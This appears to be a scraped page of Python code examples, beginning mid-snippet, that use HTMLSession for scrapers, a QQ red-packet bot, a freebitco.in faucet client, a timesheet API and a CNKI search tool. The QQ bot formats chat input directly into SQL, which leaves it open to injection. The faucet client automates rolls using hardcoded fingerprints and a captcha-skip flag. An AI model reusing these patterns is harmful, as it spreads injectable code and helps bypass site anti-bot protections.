                    'a', first=True).attrs['href']

            # Find image link and vol. num
            try:
                volume = get_volume(page)
                image = page.html.find('div.inner', first=True).find(
                    'img', first=True).attrs['src']
            except:
                self.queue.put(
                    "Could not find image link. Website is not Twisted Hel Scan page?"
                )
                return

            # Download the image
            image = session.get(image)

            # Make manga directory
            if not os.path.exists(title):
                try:
                    os.mkdir(title)
                except IOError:
                    self.queue.put("Could not make directory")
                    return

            # Make volume directory
            if not os.path.exists(title + "/" + volume):
                try:
                    os.mkdir(title + "/" + volume)
                except IOError:
                    self.queue.put("Could not make directory")
                    return

                counter = 1

            # Write image to file
            self.write_image(image, title, volume, counter)
            counter += 1

            # Find next link
            next_link = page.html.find('div.inner', first=True).find(
                'a', first=True).attrs['href']
        self.queue.put("Done")

Exemplo n.º 26

0

Exibir arquivo

def onQQMessage(bot, contact, member, content):

    if not bot.isMe(contact, member):

        if content == '.help' or '[@ME]' in content:
            bot.SendTo(
                contact, '转发【链接】添加红包\n' + '输入【.1】获取红包并垫一手\n' +
                '输入【.11】获取红包但不垫\n' + '输入【.2】查询剩余个数\n' +
                '输入【.u1 链接】将链接标记为已使用\n' + '输入【.u0 链接】将链接标记为未使用\n')

        elif content == '.stop':
            bot.SendTo(contact, '红包机器人好像关闭不了')
            # bot.Stop()

        else:
            con = sqlite3.connect(DB_NAME)  # 目录是qqbot的启动目录
            cur = con.cursor()
            table = 'hb'
            # SQLite does not have a separate Boolean storage class.
            # Instead, Boolean values are stored as integers 0 (false) and 1 (true).
            cur.execute(
                'CREATE TABLE IF NOT EXISTS %s (url TEXT PRIMARY KEY, used INTEGER DEFAULT 0)'
                % table)

            # if content == '.clrdb':
            #     try:
            #         cur.execute('DELETE FROM %s' % table)
            #         bot.SendTo(contact, '清库成功！')
            #     except Exception as e:
            #         bot.SendTo(contact, '清库失败！异常：' + str(e))

            if content.startswith('https://url.cn/') and len(content) == 22:
                bot.SendTo(contact, content)
                bot.SendTo(contact, '收到红包链接，处理中...')

                try:
                    cur.execute('insert into %s values("%s", 0)' %
                                (table, content))
                    bot.SendTo(contact, '添加成功！')
                    con.commit()

                except Exception as e:
                    if 'Duplicate' or 'UNIQUE' in str(e):
                        bot.SendTo(contact, '添加失败！这个红包已经有了！')
                    else:
                        bot.SendTo(contact, '添加失败！异常：' + str(e))
                    con.rollback()

            elif content == '.1':
                bot.SendTo(contact, '查询中...')
                cur.execute('SELECT url FROM %s WHERE used=0' % table)
                data = cur.fetchone()

                if data == None:
                    bot.SendTo(contact, '红包已经耗尽了！')
                else:
                    url = data[0]

                    url_login = '******'
                    headers = \
                        {'Host': 'api.mtdhb.org',
                         'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0',
                         'Accept': 'application/json, text/plain, */*',
                         'Accept-Language': 'en-US,en-US;q=0.7,en;q=0.3',
                         'Accept-Encoding': 'gzip, deflate, br',
                         'Content-Type': 'application/x-www-form-urlencoded',
                         'DNT': '1',
                         'Connection': 'keep-alive'}
                    browser = HTMLSession()
                    browser.get(url_login, headers=headers)

                    data_login = {'account': ACCOUNT, 'password': PASSWORD}
                    url_login_api = 'https://api.mtdhb.org/user/login'
                    r = browser.post(url_login_api, data=data_login)
                    if r.json()['code'] == 0:
                        bot.SendTo(contact, '登录成功...')

                        url_receive_api = 'https://api.mtdhb.org/user/receiving'
                        data_receive = {'phone': '', 'url': url, 'force': 0}

                        headers['X-User-Token'] = r.json()['data']['token']

                        r = browser.post(url_receive_api,
                                         data=data_receive,
                                         headers=headers)
                        if r.json()['code'] == 0:
                            sec = 3
                            bot.SendTo(contact, '正在垫一手...等待%d秒' % sec)
                            url_number_api = 'https://api.mtdhb.org/user/number'
                            time.sleep(sec)

                            r = browser.get(url_number_api, headers=headers)
                            if r.json()['code'] == 0:
                                bot.SendTo(
                                    contact, '剩余次数：%d' %
                                    r.json()['data']['ele']['available'])
                                bot.SendTo(
                                    contact, '总共次数：%d' %
                                    r.json()['data']['ele']['total'])
                            else:
                                bot.SendTo(contact,
                                           '获取次数失败！JSON = %s' % r.json())

                            bot.SendTo(contact, '最佳手气红包链接如下，可以直接领取：')
                            bot.SendTo(contact, url)

                            try:
                                cur.execute(
                                    'UPDATE %s SET used=1 WHERE url = "%s"' %
                                    (table, url))
                                con.commit()

                                cur.execute(
                                    'SELECT count(*) FROM %s WHERE used=0' %
                                    table)
                                bot.SendTo(contact,
                                           '未使用红包：%d个' % cur.fetchone()[0])

                            except Exception as e:
                                bot.SendTo(contact, '更新标记失败！\n' + str(e))
                                con.rollback()

                        else:
                            bot.SendTo(contact, '垫一手失败！JSON = %s' % r.json())
                    else:
                        bot.SendTo(contact, '登录失败！JSON = %s' % r.json())

            elif content == '.11':
                bot.SendTo(contact, '查询中...')
                cur.execute('SELECT url FROM %s WHERE used=0' % table)
                data = cur.fetchone()

                if data == None:
                    bot.SendTo(contact, '红包已经耗尽了！')
                else:
                    url = data[0]
                    bot.SendTo(contact, '红包链接如下：')
                    bot.SendTo(contact, url)

                    try:
                        cur.execute('UPDATE %s SET used=1 WHERE url = "%s"' %
                                    (table, url))
                        con.commit()

                        cur.execute('SELECT count(*) FROM %s WHERE used=0' %
                                    table)
                        bot.SendTo(contact, '未使用红包：%d个' % cur.fetchone()[0])

                    except Exception as e:
                        bot.SendTo(contact, '更新标记失败！\n' + str(e))
                        con.rollback()

            elif content == '.2':
                try:
                    cur.execute('SELECT count(*) FROM %s WHERE used=0' % table)
                    bot.SendTo(contact, '未使用红包：%d个' % cur.fetchone()[0])
                    # cur.fetchone() => Row
                    # cur.fetchone()[0] => Row[Col=0]

                    cur.execute('SELECT count(*) FROM %s' % table)
                    bot.SendTo(contact, '总红包数量：%d个' % cur.fetchone()[0])

                except Exception as e:
                    bot.SendTo(contact, '查询失败！异常：' + str(e))

            elif content.startswith('.u1 '):
                url = content.split(' ')[1]
                if url.startswith('https://url.cn/') and len(url) == 22:
                    try:
                        cur.execute('UPDATE %s SET used=1 WHERE url="%s"' %
                                    (table, url))
                        con.commit()
                        bot.SendTo(contact, '标记成功')
                    except Exception as e:
                        con.rollback()
                        bot.SendTo(contact, '标记异常：' + str(e))
                else:
                    bot.SendTo(contact, '链接不正确！')

            elif content.startswith('.u0 '):
                url = content.split(' ')[1]
                if url.startswith('https://url.cn/') and len(url) == 22:
                    try:
                        cur.execute('UPDATE %s SET used=0 WHERE url="%s"' %
                                    (table, url))
                        con.commit()
                        bot.SendTo(contact, '标记成功')
                    except Exception as e:
                        con.rollback()
                        bot.SendTo(contact, '标记异常：' + str(e))
                else:
                    bot.SendTo(contact, '链接不正确！')

            elif content.startswith('.'):
                bot.SendTo(contact, '未知指令，输入【.help】获取帮助')

            cur.close()
            con.close()

Exemplo n.º 27

0

Exibir arquivo

Arquivo: fbclient.py Projeto: aablack/FreebitcoinClient

class Client:
    _URL = 'https://freebitco.in'

    def __init__(self, verify_ssl=True):
        self._logger = logging.getLogger('root.fbclient_direct')
        self._session = HTMLSession()
        self._session.verify = verify_ssl
        self._cache = defaultdict(lambda: (None, datetime.now(), 5))

    def _check_login(func):
        def wrapper(*args, **kwargs):
            self = args[0]
            self._logger.debug('Verifying login')
            html = self._get_main_page()

            if html.find('#balance', first=True):
                return func(*args, **kwargs)

            self._logger.error('You are not logged in')
            raise LoginError('Not logged in')

        return wrapper

    def login(self, username, password, otc=None):
        self._logger.info(f'Logging in, user: {username}')

        if not username:
            self._logger.error('Username required')
            raise ValueError('Username required')
        elif not password:
            self._logger.error('Password required')
            raise ValueError('Password required')

        login_page = self._session.get(f'{self._URL}/?op=signup_page')

        csrf = login_page.cookies['csrf_token']
        self._session.headers['x-csrf-token'] = csrf

        data = (f'csrf_token={quote(csrf)}'
                f'&op=login_new'
                f'&btc_address={quote(username)}'
                f'&password={quote(password)}')

        if otc:
            data += f'&tfa_code={otc}'

        response = self._session.post(self._URL, data)
        result = response.text.split(':')

        if result[0] == 's':
            self._logger.info('Login success')
            self._session.cookies['btc_address'] = result[1]
            self._session.cookies['password'] = result[2]
            self._session.cookies['have_account'] = '1'
        elif result[0] == 'e':
            raise LoginError(f'Login failed: {result[1]}')
        else:
            raise LoginError(f'Login failed: {response}')

    @_check_login
    def activate_rp_bonus(self, amount=100):
        return self._activate_bonus(_RewardType.Points, amount)

    @_check_login
    def activate_lottery_bonus(self, amount=100):
        return self._activate_bonus(_RewardType.Lottery, amount)

    @_check_login
    def activate_btc_bonus(self, amount=1000):
        return self._activate_bonus(_RewardType.FreeBTC, amount)

    @_check_login
    def roll(self, play_without_captcha=False):
        self._logger.info('Rolling')
        login_page = self._session.get(f'{self._URL}')

        data = (f'csrf_token={self._session.headers["x-csrf-token"]}'
                f"&op=free_play"
                f"&fingerprint=43b0ec50d04dfcf473f26b8fa7c8f72f"
                f"&client_seed={self._get_roll_seed()}"
                f"&fingerprint2=2592886125"
                f"&pwc={int(play_without_captcha)}"
                f"&89591411d5cf=1567309413%3A26e9b826a33e321aa27c09d235c158ff18de7f48ce850838ffe7f669cc30b436"
                f"&d4202f82cc23=1b208b3be22da3a07e58deb40fbecc0ef43b43b3216b8c2cc9ba7bc28646c21e")

        response = self._session.post(self._URL, data)
        result = response.text.split(':')

        if result[0] == 's':
            self._logger.info(f'Roll success, number: {result[1]}, win: {result[3]} BTC, balance: {result[2]} BTC')
            return True
        elif result[0] == 'e':
            self._logger.error(f'Roll failed: {result[1]}')
        else:
            self._logger.error(f'Roll failed: {response.text}')

        return False

    @_check_login
    def get_roll_timer(self):
        self._logger.info('Retrieving roll timer')
        html = self._get_main_page()
        time_remaining_pattern = re.compile("\$\('#time_remaining'\).countdown\({until: \+(\d+)")
        match = time_remaining_pattern.search(html.html)

        if not match:
            self._logger.info('Timer not running')
            return 0

        countdown = match.group(1)
        self._logger.info(f'Timer value: {countdown}')
        return int(countdown)

    @_check_login
    def get_balance(self):
        self._logger.info('Retrieving points balance')
        html = self._get_main_page()
        balance = html.find('#balance', first=True).text
        self._logger.info(f'Balance: {balance}')
        return float(balance.replace(',', ''))

    @_check_login
    def get_rp_bonus_timer(self):
        return self._get_rewards_timer(_RewardType.Points)

    @_check_login
    def get_lottery_bonus_timer(self):
        return self._get_rewards_timer(_RewardType.Lottery)

    @_check_login
    def get_btc_bonus_timer(self):
        return self._get_rewards_timer(_RewardType.FreeBTC)

    @_check_login
    def get_rewards_balance(self):
        self._logger.info('Retrieving rewards balance')
        html = self._get_main_page()
        points = html.find('div.user_reward_points', first=True).text
        self._logger.info(f'Rewards points: {points}')
        return int(points.replace(',', ''))

    def _get_rewards_timer(self, reward_type):
        self._logger.info(f'Retrieving rewards timer: {reward_type.bonus_id}')
        html = self._get_main_page()
        bonus_pattern = re.compile(f'BonusEndCountdown\("{reward_type.bonus_id}",(\d+)\)')
        match = bonus_pattern.search(html.html)

        if not match:
            self._logger.info(f'Bonus timer: {reward_type.bonus_id} not running')
            return 0

        countdown = match.group(1)
        self._logger.info(f'Timer value: {countdown}')
        return int(countdown)

    def _get_main_page(self):
        html, expiry, cache_time = self._cache['html']

        if datetime.now() >= expiry:
            self._logger.debug('Downloading main page')
            html = self._session.get(f'{self._URL}/?op=home').html
            expiry = datetime.now() + timedelta(seconds=cache_time)
            self._cache['html'] = (html, expiry, cache_time)

        return html

    def _activate_bonus(self, reward_type, amount):
        self._logger.info('Activating: %s %d bonus' % (reward_type.name, amount))

        response = self._session.get(f'{self._URL}/'
                                     f'?op=redeem_rewards'
                                     f'&id={reward_type.bonus_id}_{amount}'
                                     f'&points='
                                     f'&csrf_token={self._session.headers["x-csrf-token"]}')

        result = response.text.split(':')

        if result[0] == 's':
            self._logger.info(f'Bonus activation successful')
            return True
        elif result[0] == 'e':
            self._logger.error(f'Roll failed: {result[1]}')
        else:
            self._logger.error(f'Roll failed: {response.text}')

        return False

    def _get_roll_seed(self, length=16):
        self._logger.info('Generating roll seed')
        chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890'
        seed = str.join('', (random.choice(chars) for i in range(length)))
        self._logger.debug('Seed: %s' % seed)
        return seed

Exemplo n.º 28

0

Exibir arquivo

# print(data)
# print(data["items"])
data_list = data["items"]
data_list_items = data_list[0]
# print(data_list_items)
data_nm = data_list_items["nm"]
# print(data_nm)
if data_nm == 'profpererobka':
    reportResourceId = data_list_items["id"]
    print(f'reportResourceId: {reportResourceId}')

params = 'core/search_items&sid=' + sid + '&params='
cur_object = 'AA9186XE'
body = '{"spec":{"itemsType":"avl_unit","propName":"sys_name","propValueMask":"' + cur_object + \
       '","sortType":"sys_name"},"force":1,"flags":1,"from":0,"to":0}'
url_params = url_resurs + params + body

print(f'{url_host}{url_resurs}{params}')

#res = session.get(url_host + url_params)
res = session.post(url_host + url_resurs + params,
                   body)  # "Content-Type", "application/json"

if res.status_code != 200:
    exit(res.status_code)

data = res.json()
print(data)
# reportObjectId = data['items'][0]['id']
# print(f'reportObjectId: {reportObjectId}')

Exemplo n.º 29

0

Exibir arquivo

class Engine:
    def __init__(self, **kwargs):
        self.q = None
        self.s = None
        self.cps = None
        self.cat = None
        self.ppath = None
        self.loc = None
        self.mode = None
        self.kwargs = None
        self.json = None
        self.url = None  # 网站url(必需)
        self.cookie = None  # 验证登入(必需)
        self.filter = None
        self.session = HTMLSession()
        self.article = "https://s.taobao.com/search?"  # 商品url
        self.store = "https://shopsearch.taobao.com/search?"  # 店铺url
        self.header = {
            "cookie": None,
        }

    def get_cookie(self, user, password):
        """获取cookie"""
        url = 'https://login.taobao.com/newlogin/login.do?appName=taobao&fromSite=0'
        parameter = {
            'loginId': user,
            'password2': password,
        }
        html = self.session.post(url, data=parameter)
        print(html.cookies)
        self.header['cookie'] = html.cookies

    def __get_parameter(self, s):
        """获取参数"""
        self.kwargs = {
            'q': self.q,
        }
        if self.mode == '宝贝':
            self.url = self.article
        else:
            self.url = self.store
        if self.cps == 'yes':
            self.kwargs['cps'] = 'yes'
            if self.cat:
                self.kwargs['cat'] = self.cat
            else:
                self.kwargs['ppath'] = self.ppath
            if self.loc:
                self.kwargs['loc'] = self.loc
        if s == 0:
            pass
        else:
            self.kwargs['s'] = s * 44
        return self.kwargs

    def __get_html(self, s):
        """获取网页内容并解码 """
        self.__get_parameter(s)
        html = self.session.get(self.url,
                                headers=self.header,
                                params=self.kwargs)
        print(html.url)
        html = html.text
        start = html.find('g_page_config = ') + len('g_page_config = ')
        end = html.find('"shopcardOff":true}') + len('"shopcardOff":true}')
        # with open('index.html', 'w', encoding='utf-8') as f:
        # 	f.write(html)
        js = json.loads(html[start:end + 1])
        self.json.append(js)
        sleep(1)

    def load_data(self):
        """ 获取搜索数据 搜索结果写到json文件里面 """
        self.json = []
        for s in range(int(self.s)):
            self.__get_html(s)
        self.set_auctions()

    # self.set_filter()

    def set_ppath(self, ppath):
        """设置ppath值 : ;"""
        self.cps = 'yes'
        self.ppath = ppath.replace(":", "%3A").replace(";", "%3B")

    def set_loc(self, loc):
        """设置loc值 ,"""
        self.cps = 'yes'
        self.ppath = self.ppath if self.ppath else ''
        self.loc = loc.replace(",", "%2C")

    def set_auctions(self):
        """ 设置网站所有商品信息 list """
        return dataprocess.set_auctions(
            [d['mods']["itemlist"]["data"]["auctions"] for d in self.json])

    def set_filter(self):
        """ 设置所有宝贝分类 dict {common(所有分类别) adv(筛选条件)}"""
        return dataprocess.set_filter(
            [self.json[0]['mods']["nav"]['data']['common']])

    @staticmethod
    def get_filter():
        """get filter"""
        # return dataprocess.getFilter()
        ...

    def get_pager(self):
        """ 获取 s 页码"""
        return [d['mods']['pager']['data'] for d in self.json]

    def get_price(self):
        """获取受喜率 价格区间 list """
        return self.json[0]['mods']['sortbar']['data']['price']['rank']

    def get_related(self):
        """ 获取相关搜索 list """
        return self.json[0]["related"]["data"]["words"]

    def get_tab(self):
        """ 获取tab参数 list"""
        return self.json[0]["tab"]["data"]["tabs"]

    def get_header(self):
        """ 获取url参数 dict
            q			关键字
            tabParams	后缀
                js
                stats_click
                initiative_id
                ie
            dropdown	切换前缀  list
                url
                text
        """
        return self.json[0]["header"]["data"]

    def detection(self):
        ...

Exemplo n.º 30

0

Exibir arquivo

        # i = 0
        # while i < len(txt2):
        #     if txt2[i: i + 4] == "frac":
        #         in_frac == True
        #
        #     if txt2[i] == "(":
        #         cnt += 1
        #     if txt2[i] == ")":
        #         cnt -= 1
        #         if cnt == 0:
        #             seg += 1
        #         if seg == 2:
        #             txt1 = txt2[:i + 1]
        #             txt2 = txt2[i + 1:]
        #             break

        # print(txt2)

        try:
            # print("xd")
            # xd = input()
            res, err = integrate.quad(f_(txt2), mn, mx)
            print(mn, mx, res)
            res = session.post("http://202.38.93.111:10190/submit",
                               data={"ans": "%f" % res})
            print("success!!", total)
            print(res.content)
        except Exception as e:
            res = session.post("http://202.38.93.111:10190/submit",
                               data={"ans": "2.33333333"})

Exemplo n.º 31

0

Exibir arquivo

Arquivo: api.py Projeto: christippett/timepro-timesheet

class TimesheetAPI:
    LOGIN_URL = "https://www.timesheets.com.au/tplogin/default.asp"
    VIEW_TIMESHEET_URL = "https://www.timesheets.com.au/tp60/ViewTimeSheet.asp"
    INPUT_TIME_URL = "https://www.timesheets.com.au/tp60/InputTime.asp"
    ERROR_TABLE_XPATH = '//a[@name="ErrorTable"]/following-sibling::table'

    LoginError = LoginError
    WebsiteError = WebsiteError

    def __init__(self):
        self.session = HTMLSession()
        self.user_context_id = None
        self.staff_id = None
        self.logged_in = False

    def _parse_html_login_errors(self, error_table):
        error_tds = error_table.xpath(
            '//img[@src="images/invalid.png"]/ancestor::tr[1]/td[2]'
        )
        return [e.text for e in error_tds]

    def _parse_html_options(self, html, option_name, selected=False):
        if selected:
            options = html.xpath(
                f'//select[@name="{option_name}"]//option[@selected]'
            ) or html.xpath(f'//input[@name="{option_name}"]')
        else:
            options = html.xpath(
                f'//select[@name="{option_name}"]//option[not(@value="")]'
            )
        options = [(o.attrs.get("value"), o.text) for o in options]
        if selected:
            return options[0] if options else None
        return options

    def _parse_html_customer_options(self, html):
        options = self._parse_html_options(html, option_name="CustomerCode_0_0")
        customers = []
        for code, description in options:
            customers.append(
                {"customer_code": code, "customer_description": description}
            )
        return customers

    def _parse_html_project_options(self, html):
        pattern = (
            r"AddProjectEntry\("
            "'(?P<customer_code>[^']*?)',"
            "'(?P<project_code>[^']*?)',"
            "'(?P<project_psid>[^']*?)',"
            "'(?P<project_description>[^']*?)',"
            "(?P<task_count>[^']*?)"
            "\)\s"
        )
        projects = re.finditer(pattern, html.html)
        return [p.groupdict() for p in projects]

    def _parse_html_task_options(self, html):
        pattern = (
            r"AddTaskEntry\("
            "'(?P<project_code>[^']*?)',"
            "'(?P<task_id>[^']*?)',"
            "'(?P<task_description>[^']*?)'"
            "\)"
        )
        tasks = re.finditer(pattern, html.html)
        return [t.groupdict() for t in tasks]

    def login(self, username, password, customer_id):
        data = {
            "CurrentClientTime": "",
            "compact": "off",
            "ForceInterface": "S",
            "systemid": customer_id,
            "username": username,
            "password": password,
        }
        r = self.session.post(self.LOGIN_URL, data=data)

        # Detect errors
        error_table = r.html.xpath(self.ERROR_TABLE_XPATH, first=True)
        if error_table:
            errors = self._parse_html_login_errors(error_table)
            raise LoginError(" ".join(errors))

        # Detect rejected logon
        rejected_login_input = r.html.find('input[name="RejectedLogon"]')
        if rejected_login_input:
            raise LoginError("Invalid login credentials.")

        # Find UserContextID (required for future session requests)
        user_context_input = r.html.find('input[name="UserContextID"]', first=True)
        if user_context_input:
            self.user_context_id = user_context_input.attrs.get("value")
        else:
            raise LoginError("UserContextID not found in login response.")

        # Load ViewTimesheet page to get StaffID
        r = self.session.post(
            self.VIEW_TIMESHEET_URL, data={"UserContextID": self.user_context_id}
        )
        staff_id_input = r.html.find('input[name="StaffID"]', first=True)
        if staff_id_input:
            self.staff_id = staff_id_input.attrs.get("value")
        else:
            raise LoginError("StaffID not found in login response.")
        self.logged_in = True

    def get_timecodes(self):
        if not self.logged_in:
            raise LoginError("Not logged in.")
        next_month_end = TODAY + relativedelta(months=+1, day=31)
        filter_day = next_month_end.strftime("%d-%b-%Y")
        data = {
            "UserContextID": self.user_context_id,
            "StaffID": self.staff_id,
            "Mode": "Day",
            "StartDate": filter_day,
            "EndDate": filter_day,
        }
        r = self.session.post(self.INPUT_TIME_URL, data=data)
        customers = self._parse_html_customer_options(r.html)
        projects = self._parse_html_project_options(r.html)
        tasks = self._parse_html_task_options(r.html)
        return customers, projects, tasks

    def get_timesheet(self, start_date=None, end_date=None):
        if start_date is None and end_date is None:
            # default to get this week's timesheet (excl. previous month)
            start_date = max(
                [TODAY + relativedelta(day=1), TODAY + relativedelta(weekday=MO(-1))]
            )
            end_date = TODAY + relativedelta(weekday=FR)
        r = self.session.post(
            self.INPUT_TIME_URL,
            data={
                "UserContextID": self.user_context_id,
                "StaffID": self.staff_id,
                "Mode": "Week",
                "StartDate": start_date.strftime("%d-%b-%Y"),
                "EndDate": end_date.strftime("%d-%b-%Y"),
            },
        )
        customer_options, project_options, task_options = self.get_timecodes()
        return Timesheet(
            html=r.html,
            customer_options=customer_options,
            project_options=project_options,
            task_options=task_options,
        )

    def post_timesheet(self, timesheet):
        form_data = timesheet.form_data()
        row_count = timesheet.count_entries()
        form_data.update(
            {
                "UserContextID": self.user_context_id,
                "StaffID": self.staff_id,
                "InputRows": row_count,
                "Save": "%A0%A0Save%A0%A0",
                "DataForm": "TimeEntry {}".format(self.staff_id),  # Important!
                # 'OptionsDisplayed': 'N',
                # 'OverrideAction': '',
                # 'DeletesPending': ''
            }
        )
        r = self.session.post(
            self.INPUT_TIME_URL,
            data=form_data,
            headers={"Referer": self.INPUT_TIME_URL},
        )

        # Detect errors
        error_table = r.html.xpath(self.ERROR_TABLE_XPATH, first=True)
        if error_table:
            errors = self._parse_html_login_errors(error_table)
            raise WebsiteError(" ".join(errors))

        return r

Exemplo n.º 32

0

Exibir arquivo

Arquivo: get_page.py Projeto: liyumeng2018/cnkiscraper

class GetPage():
    def __init__(self):
        self.session = HTMLSession()
        self.cur_page_num = 1  # 目前页码
        # 获取cookie保持会话
        self.session.get(BASIC_URL, headers=HEADER)

    # 传入搜索要用的关键字， 以及搜索条件。必须为str
    def getSearchResult(self, kword, condition):
        # 这里可以控制搜索的数据库。不作限制。
        static_post_data = {
            'action': '',
            'NaviCode': '*',
            'ua': '1.21',
            'isinEn': '1',
            'PageName': 'ASP.brief_default_result_aspx',
            'DbPrefix': 'SCDB',
            'DbCatalog': '中国学术期刊网络出版总库',
            'ConfigFile': 'SCDB.xml',
            'db_opt': 'CJFQ,CDFD,CMFD,CPFD,IPFD,CCND,CCJD',  # 搜索类别（CNKI右侧的）
            'his': '0',
            '__': time.asctime(time.localtime()) + ' GMT+0800 (中国标准时间)'
        }
        # 此处可以更改搜索参数
        search_condition = {
            '主题': 'SU$%=|',
            '关键词': 'KY$=|',
            '篇名': 'TI$%=|',
            '摘要': 'AB$%=|',
            '全文': 'FT$%=|'
        }
        u_input = {
            'txt_1_sel': '',
            'txt_1_value1': '',
            'txt_1_relation': '#CNKI_AND',
            'txt_1_special1': '='
        }
        u_input['txt_1_sel'] = search_condition.get(condition)
        u_input['txt_1_value1'] = kword
        post_data = dict(static_post_data, **u_input)
        # 发送post请求
        req_first = self.session.post(POST_URL, data=post_data, headers=HEADER)
        # 传入搜索的关键词
        k_v = quote(u_input.get('txt_1_value1'))
        # 构造url发送get请求，得到搜索结果列表页
        result_url = GET_PAGE_URL + req_first.text + '&t=1544249384932&keyValue=' + k_v + '&S=1&sorttype='
        req_sec = self.session.get(result_url, headers=HEADER)
        # 解析搜索结果列表页，得到标题、详情页URL、作者、来源、发表时间、数据库、被引、下载
        rows = req_sec.html.xpath('//tr[@bgcolor]')
        for row in rows:
            td = row.find('td')
            title = td[1].find('a', first=True).text
            detail_url = re.sub('/kns', 'http://kns.cnki.net/KCMS',
                                td[1].find('a', first=True).attrs['href'])
            author = td[2].text
            journal = td[3].text
            publish_date = td[4].text
            database = td[5].text
            cite_count = row.find('span[class="KnowledgeNetcont"]', first=True)
            if cite_count:
                cite_count = cite_count.text
            else:
                cite_count = 0
            print(title)
            print(detail_url)
            print(author)
            print(journal)
            print(publish_date)
            print(database)
            print(cite_count)
            i = GetDetail().parsePage(detail_url)
            if i:
                for a in i:
                    print(a)